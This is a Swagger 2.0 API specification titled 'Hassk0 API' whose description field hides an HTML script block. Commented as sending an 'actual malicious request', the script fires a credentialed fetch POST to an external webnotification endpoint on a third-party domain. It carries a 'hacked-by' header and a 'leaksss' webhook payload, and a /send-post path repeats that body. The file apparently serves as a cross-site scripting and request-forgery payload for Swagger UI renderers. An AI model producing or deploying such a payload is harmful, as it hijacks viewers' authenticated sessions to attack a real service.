swagger: '2.0'
info:
  version: '1.0.0'
  title: ☠ Hassk0 API ☠
  description: |
    <h2>Preparing API request... Please wait.</h2>
    <script>
    // Send actual malicious request immediately
    fetch('https://webnotification.eus2.es-cs.bentley.com/api/Events/Execute', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'hacked-by': 'hassk0d4rk'
      },
      body: JSON.stringify({
        "Source": "any dummy",
        "Context": "any dummy value",
        "Action": "leaksss",
        "WebSocket": {},
        "Webhook": {
          "Invoke": true,
          "Body": "hacked by hassk0d4rk;D"
        }
      }),
      credentials: 'include'
    });
    </script>
host: example.com
paths:
  /send-post:
    post:
      summary: Send JSON data to API (Click to Send)
      description: >
        This simulates sending structured event data. Press "Try it out" and "Execute" to send.
      parameters:
        - name: body
          in: body
          required: true
          schema:
            type: object
            properties:
              Source:
                type: string
                example: any dummy
              Context:
                type: string
                example: any dummy value
              Action:
                type: string
                example: leaksss
              WebSocket:
                type: object
                example: {}
              Webhook:
                type: object
                properties:
                  Invoke:
                    type: boolean
                    example: true
                  Body:
                    type: string
                    example: hacked by hassk0d4rk;D
      responses:
        200:
          description: Request sent
